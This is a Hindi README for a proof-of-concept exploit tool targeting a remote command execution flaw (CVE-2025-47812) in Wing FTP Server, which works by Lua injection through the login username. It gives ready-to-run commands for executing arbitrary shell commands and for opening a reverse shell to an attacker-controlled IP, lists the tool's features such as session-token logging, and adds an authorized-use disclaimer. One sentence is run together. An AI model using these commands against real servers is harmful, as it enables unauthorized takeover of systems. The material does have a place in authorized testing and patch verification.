
विंग FTP सर्वर (CVE-2025-47812) के लिए रिमोट कमांड निष्पादन एक्सप्लॉइट
यह रिपॉज़िटरी CVE-2025-47812 के लिए एक proof-of-concept एक्सप्लॉइट प्रदान करती है, जो Wing FTP Server में एक रिमोट कमांड एक्ज़ीक्यूशन (RCE) भेद्यता है। एक हमलावर प्रमाणीकरण के दौरान username पैरामीटर का दुरुपयोग करके मनमाना Lua-आधारित सिस्टम कमांड इंजेक्ट और निष्पादित कर सकता है, जिसके परिणामस्वरूप पूर्ण रिमोट कोड एक्ज़ीक्यूशन होता है।
found_uids.txt में लॉग करता हैएक साधारण शेल कमांड निष्पादित करें:
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"
रिवर्स शेल ट्रिगर करें:
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444
ड्राई-रन मोड (कोई अनुरोध नहीं भेजा जाएगा):
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run
यह प्रोजेक्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है।
इस टूल का उपयोग उन सिस्टमों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।
| Feature/Improvement | Description |
|---|
| ✅ आर्गुमेंट पार्सिंग | गैर-इंटरैक्टिव मोड के लिए argparse CLI समर्थन जोड़ा गया |
| 🔐 इनपुट सत्यापन | एक्सप्लॉइट प्रयास से पहले मान्य URL/IP/पोर्ट सुनिश्चित करता है |
| 📦 हेडर रीफ़ैक्टरिंग | स्थिरता के लिए HTTP हेडर को पुन: प्रयोज्य फ़ंक्शन में निकाला गया |
| 📄 UID लॉगिंग | सफल UID टोकन को found_uids.txt में सहेजता है |
| 🧪 ड्राई-रन मोड | अनुरोध भेजे बिना सुरक्षित परीक्षण की अनुमति देता है (--dry-run) |
| 🕒 टाइमआउट + रीट्राई | अनुरोध टाइमआउट और विफलता पर स्वचालित रीट्राई प्रयास जोड़ता है |
| 🧼 पेलोड पठनीयता | स्पष्टता और रखरखाव के लिए Lua इंजेक्शन स्ट्रिंग को पुनः प्रारूपित किया गया |
| 📊 संरचित आउटपुट | आसान पढ़ने के लिए सर्वर प्रतिक्रियाओं और पेलोड जानकारी को डिलीमीटर के साथ लपेटा गया |
| ⚠️ स्टेटस कोड जाँच | लक्ष्य अप्रत्याशित HTTP स्टेटस कोड लौटाता है तो उपयोगकर्ता को चेतावनी देता है |
| 📝 लॉगिंग सिस्टम | बेहतर वर्बोसिटी नियंत्रण के लिए print() को Python logging मॉड्यूल से बदलता है |